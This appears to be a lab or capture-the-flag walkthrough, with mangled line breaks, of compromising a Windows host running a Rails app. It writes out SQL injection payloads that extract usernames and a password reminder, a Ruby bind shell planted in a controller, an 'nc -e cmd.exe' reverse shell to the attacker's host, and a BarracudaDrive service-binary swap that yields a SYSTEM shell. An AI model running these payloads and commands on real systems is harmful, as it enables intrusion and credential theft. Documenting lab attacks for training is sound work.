nmapAutomator.sh -H 192.168.237.127 -t full
nmapAutomator.sh -H 192.168.237.127 -t vulns
wget -r ftp://[email protected]:30021
christopher
, we get "The password reminder doesn't match the records", which is different from the other users - "The user does not exist".christopher
is a valid user./users
path. By trying http://192.168.237.127:33033/users/christopher
, we get an error traceback./users
takes 4 request methods:/slug
.http://192.168.237.127:33033/slug?URL=%27%20UNION%20SELECT%20IF(1=2,%20SLEEP(5),%20null)--%20-
IF
conditional will make the server sleep for 5 seconds if the condition is True, or respond immediately otherwise.SELECT username FROM users LIMIT 0,1
output gets reflected in the MySQL error.http://192.168.237.127:33033/slug?URL=%27%20AND%201=%20(SELECT%201%20FROM(SELECT%20COUNT(*),concat(0x3a,(SELECT%20username%20FROM%users%20LIMIT%200,1),FLOOR(rand(0)*2))x%20FROM%20information_schema.TABLES%20GROUP%20BY%20x)a)--%20-
evren.eagan
is the first username.SELECT reminder FROM USERS LIMIT 0,1
, we see the reminder, 4qpdR87QYjRbog
.users_controller.rb
, which handles HTTP requests related to the /user
path.PATCH/PUT
handler to include this bind shell payload: https://github.com/secjohn/ruby-shells/blob/master/shell.rb​users_controller.rb
and submitting the "Update User" form, we can then connect to the bind shell.nc.exe
and run it.copy \\192.168.49.237\ROPNOP\nc.exe .
nc -e cmd.exe 192.168.49.237 139
bdctl.exe
. This is an executable from the BarracudaDrive program.C:\bd
directory, we find a readme.txt
which shows the changelog.addAdmin.c
:i686-w64-mingw32-gcc addAdmin.c -o bd.exe
bd.exe
: move bd.exe bd.service.exe
bd.exe
: copy \\192.168.49.237\ROPNOP\bd.exe .
shutdown /r
. We should be able to catch a shell as SYSTEM: